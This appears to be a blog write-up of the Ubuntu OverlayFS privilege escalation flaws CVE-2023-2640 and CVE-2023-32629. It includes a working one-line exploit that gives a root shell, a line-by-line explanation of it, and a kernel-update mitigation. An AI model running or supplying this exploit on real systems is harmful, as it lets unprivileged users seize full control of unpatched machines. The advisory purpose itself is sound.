Ubuntu GameOver(lay) Local Privilege Escalation CVE-2023–32629 and CVE-2023–2640
The vulnerabilities CVE-2023–32629 and CVE-2023–2640 were both discovered in the Ubuntu kernel’s OverlayFS module. A simple POC to check if your ubuntu is vulnerable, and how to fix it.
CVE-2023–2640
This vulnerability involves specific Ubuntu kernels that permit an unprivileged user to set privileged extended attributes on mounted files without the proper security checks. Essentially, an unprivileged user could set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks, which could potentially lead to unauthorized access or other unspecified impacts.
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2023-2640
CVE-2023–32629
This is a local privilege escalation vulnerability that skips permission checks when performing certain operations on Ubuntu kernels. More specifically, the flaw is in the OverlayFS ovl_copy_up_meta_inode_data
function where permission checks are skipped when calling ovl_do_setxattr
on Ubuntu kernels.
Reference:
https://www.tenable.com/cve/CVE-2023-32629
https://access.redhat.com/security/cve/CVE-2023-32629
Impact
Both vulnerabilities enable a local privilege escalation, where an unprivileged user can gain elevated privileges on the system. This is a serious issue as it allows attackers with basic access to escalate their privileges to a root level, gaining full control over the affected system.
POC
Payload
To check if the ubuntu support or running overlay.
#Check if the Module is Loaded
lsmod | grep overlay
#Check if the Module is Available
modinfo overlay
#Check the Filesystem Type
mount | grep overlay
#Make sure you run this payload with lower privilege user, you may change the /bin/bash to other command.
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
Payload Explanation
unshare -rm
unshare
is a command that allows you to run a program in a new namespace. A namespace is a feature of the Linux kernel that partitions kernel resources so that one set of processes sees one set of resources while another set of processes sees another, isolated set of resources.- The
-r
option creates a new user namespace and maps the user to root in the new namespace. - The
-m
option creates a new mount namespace, meaning that any mounts made won't be seen by processes outside of this namespace.
sh -c “mkdir l u w m && cp /u*/b*/p*3 l/;
- This invokes a new shell
sh
to execute the command string provided after-c
. mkdir l u w m
creates four directories namedl
,u
,w
, andm
.cp /u*/b*/p*3 l/
this command is copying a Python3 binary (based on the pattern/u*/b*/p*3
) to thel
directory.
setcap cap_setuid+eip l/python3;
setcap
is used to set capabilities on binaries.cap_setuid
allows the binary to change its UID (User Identifier).+eip
ensures that the capability is effective, inheritable, and permitted.- This command is granting the python3 binary in the
l
directory the ability to change its user ID, effectively allowing it to become any user, including root.
mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m
- This mounts an overlay filesystem. Overlay filesystems let you overlay one directory (called the upper directory) on top of another (called the lower directory).
- Here, it’s overlaying the directory
u
overl
, usingw
as a work directory, and mounting the resulting filesystem atm
.
touch m/*
- This command is creating a new, empty file for every file that exists in the
m
directory.
u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
- After the
sh
command sequence completes, this runs a Python3 command from theu
directory. os.setuid(0)
sets the user ID of the current process to 0, which is the UID for root. Given that the Python3 binary has been granted thecap_setuid
capability, it can effectively change its UID to root.os.system("/bin/bash")
starts a new bash shell. Since the process's user ID was just set to root, this bash shell runs with root privileges.
Payload reference:
https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/ a
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh
Mitigation
Update ubuntu kernel version.